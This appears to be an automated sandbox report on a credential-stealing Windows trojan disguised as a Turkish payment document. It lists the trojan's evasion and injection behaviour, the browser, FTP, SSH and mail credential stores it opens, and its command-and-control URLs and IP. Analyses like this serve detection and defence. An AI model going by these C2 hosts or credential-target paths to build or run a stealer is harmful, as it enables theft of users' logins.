            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 4930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 5010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 6010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 6140000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 7140000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 7490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 8490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 9490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: BB60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: CB60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 5010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 6140000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 7490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 8490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: 9490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exe TID: 6972Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exe TID: 7120Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exe TID: 7120Thread sleep time: -2040000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeThread delayed: delay time: 60000Jump to behavior
            Source: Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeMemory written: C:\Users\user\Desktop\Odeme_belgesi.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exeJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeProcess created: C:\Users\user\Desktop\Odeme_belgesi.exe C:\Users\user\Desktop\Odeme_belgesi.exeJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeQueries volume information: C:\Users\user\Desktop\Odeme_belgesi.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: PopPassword1_2_0040D069
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: SmtpPassword1_2_0040D069
            Source: Yara matchFile source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            2
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
            Process Injection
            1
            Disable or Modify Tools
            2
            Credentials in Registry
            41
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            41
            Virtualization/Sandbox Evasion
            Security Account Manager1
            File and Directory Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS13
            System Information Discovery
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Process Injection
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Odeme_belgesi.exe55%ReversingLabsWin32.Trojan.Generic
            Odeme_belgesi.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            solutviewmen.viewdns.net5%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://alphastand.trade/alien/fre.php14%VirustotalBrowse
            http://solutviewmen.viewdns.net/bdifygidj/five/fre.php0%VirustotalBrowse
            http://www.ibsensoftware.com/3%VirustotalBrowse
            http://kbfvzoboss.bid/alien/fre.php12%VirustotalBrowse
            http://alphastand.win/alien/fre.php12%VirustotalBrowse
            http://alphastand.top/alien/fre.php16%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            solutviewmen.viewdns.net
            45.66.231.242
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrueunknown
            http://alphastand.win/alien/fre.phptrueunknown
            http://solutviewmen.viewdns.net/bdifygidj/five/fre.phptrueunknown
            http://alphastand.trade/alien/fre.phptrueunknown
            http://alphastand.top/alien/fre.phptrueunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://solutviewmen.viewdns.net/bdifygidj/five/fre.phpwDOdeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmptrue
              unknown
              http://www.ibsensoftware.com/Odeme_belgesi.exe, Odeme_belgesi.exe, 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              45.66.231.242
              solutviewmen.viewdns.netGermany
              33657CMCSUStrue
